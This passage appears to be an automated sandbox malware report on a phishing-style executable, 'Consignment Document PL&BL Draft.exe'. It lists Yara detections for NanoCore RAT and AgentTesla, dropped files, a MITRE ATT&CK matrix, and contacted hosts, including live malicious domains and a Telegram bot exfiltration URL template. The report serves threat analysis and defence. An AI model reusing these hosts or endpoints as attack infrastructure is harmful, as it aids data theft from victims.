essagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe, 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Icda.exe.1.dr	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, type: DROPPED
Source: Yara match	File source: 5.0.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
Source: Yara match	File source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05292546 bind,		3_2_05292546
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_05292523 bind,		3_2_05292523

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job2	Access Token Manipulation1	Disable or Modify Tools1	OS Credential Dumping1	Account Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Process Injection12	Deobfuscate/Decode Files or Information1	Input Capture11	File and Directory Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job2	Logon Script (Windows)	Scheduled Task/Job2	Scripting1	Security Account Manager	System Information Discovery116	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information121	NTDS	Query Registry1	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing24	LSA Secrets	Security Software Discovery321	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading2	Cached Domain Credentials	Virtualization/Sandbox Evasion15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion15	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Consignment Document PL&BL Draft.exe	21%	Virustotal		Browse
Consignment Document PL&BL Draft.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Icda.exe	100%	Avira	TR/Dropper.MSIL.Gen7
C:\Users\user\AppData\Local\Temp\VLC2.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	100%	Avira	HEUR/AGEN.1101060
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Avira	TR/Dropper.MSIL.Gen7
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Icda.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VLC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	94%	ReversingLabs	ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	67%	ReversingLabs	ByteCode-MSIL.Infostealer.DarkStealer
C:\Users\user\AppData\Local\Temp\Icda.exe	94%	ReversingLabs	ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	86%	ReversingLabs	ByteCode-MSIL.Infostealer.Fareit
C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.Ursnif
C:\Users\user\AppData\Local\Temp\VLC2.exe	86%	ReversingLabs	ByteCode-MSIL.Infostealer.Fareit

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.0.dhcpmon.exe.c80000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.VLC2.exe.900000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.Fdquqwatjjr.exe.4e0000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
3.2.Icda.exe.a40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.VLC2.exe.a0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.2.Fdquqwatjjr.exe.4e0000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
3.0.Icda.exe.a40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.2.Rczgwoxvqzh.exe.c00000.0.unpack	100%	Avira	HEUR/AGEN.1101060	Download File
1.2.Consignment Document PL&BL Draft.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1101060	Download File
3.2.Icda.exe.5970000.5.unpack	100%	Avira	TR/NanoCore.fadte	Download File
14.2.VLC2.exe.900000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
16.2.VLC2.exe.a0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.0.Isgeprf.exe.710000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
17.2.dhcpmon.exe.c80000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.Isgeprf.exe.710000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
2.0.Rczgwoxvqzh.exe.c00000.0.unpack	100%	Avira	HEUR/AGEN.1101060	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://dh2LZPEqfQO.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://mail.flood-protection.org	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://EAXDhR.com	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://flood-protection.org	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
flood-protection.org	85.187.154.178	true	true	unknown
centurygift.myq-see.com	172.94.25.202	true	false	high
mail.flood-protection.org	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.apache.org/licenses/LICENSE-2.0	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://DynDns.comDynDNS	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dh2LZPEqfQO.net	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.tiro.com	Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.orgGETMozilla/5.0	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.flood-protection.org	Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
https://api.telegram.org/bot%telegramapi%/	Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Fdquqwatjjr.exe.2.dr	false		high
http://www.jiyu-kobo.co.jp/	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://EAXDhR.com	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://flood-protection.org	Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
